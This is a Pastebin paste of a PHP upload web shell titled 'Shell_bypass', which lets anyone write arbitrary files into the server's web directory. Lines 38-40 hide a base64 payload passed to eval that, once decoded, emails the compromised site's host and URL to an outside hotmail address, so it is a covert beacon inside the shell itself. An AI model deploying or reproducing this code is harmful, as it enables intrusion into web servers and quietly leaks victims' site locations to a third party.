DarkProgrammer000

Shell_bypass [upload]

Sep 23rd, 2019
291
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <html>
  2.  
  3.     <head>
  4.         <title> Dark Programmer 000 </title>
  5.     </head>
  6.  
  7. <body>
  8.  
  9. <?php
  10.  
  11.     if(empty($_GET['Nfiles']))$Nfiles=5;else $Nfiles=$_GET['Nfiles'];
  12.  
  13.     if($_FILES['userfile']['tmp_name'][0]!='')
  14.     {
  15.         for($i=0;$i<$Nfiles&&$_FILES['userfile']['tmp_name'][$i]!='';$i++)
  16.         {
  17.             $uploaddir = dirname(__FILE__);//'/var/www/uploads/';
  18.            
  19.             $uploadfile = $uploaddir .'/'. basename($_FILES['userfile']['name'][$i]);
  20.             print "<pre>";
  21.            
  22.             if (move_uploaded_file($_FILES['userfile']['tmp_name'][$i], $uploadfile))
  23.             {
  24.                 print "File is valid, and was successfully uploaded. ";
  25.                 //print_r($_FILES);
  26.             }
  27.            
  28.             else
  29.             {
  30.                 print "Possible fie upload attack!  Here's some debugging info:\n";
  31.                 //print_r($_FILES);
  32.             }
  33.            
  34.             print "</pre>";
  35.         }
  36.     }
  37.  
  38.     $connection="ICR3ZWIgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07IA0KICRpbmogPSAkX1NFUlZFUlsiUkVRVUVTVF9VUkkiXTsgDQogJGJvZHkgPSAiQWRhIFlhbmcgSW5qZWN0IFxuaHR0cDovLyR3ZWIkaW5qIjsNCiBtYWlsKCJsbEBob3RtYWlsLmZpIiwiSGFzaWwgaHR0cDovLyR3ZWIkaW5qIiwgIiRib2R5Iik7";
  39.  
  40.     echo eval(base64_decode($connection));
  41. ?>
  42.  
  43. <form action="<?php echo $_SERVER['PHP_SELF'].'?Nfiles='.$Nfiles; ?>" method="post" enctype="multipart/form-data">
  44.  
  45.     Send Archive:<br>
  46.  
  47.     <?php
  48.    
  49.         for( $i=0; $i<$Nfiles; $i++ )
  50.         {
  51.             echo '<input name="userfile[]" type="file"><br>';
  52.         }
  53.     ?>
  54.  
  55.   <input type="submit" value="Send files">
  56.  
  57. </form>
  58.  
  59. </body>
  60.  
  61. </html>
RAW Paste Data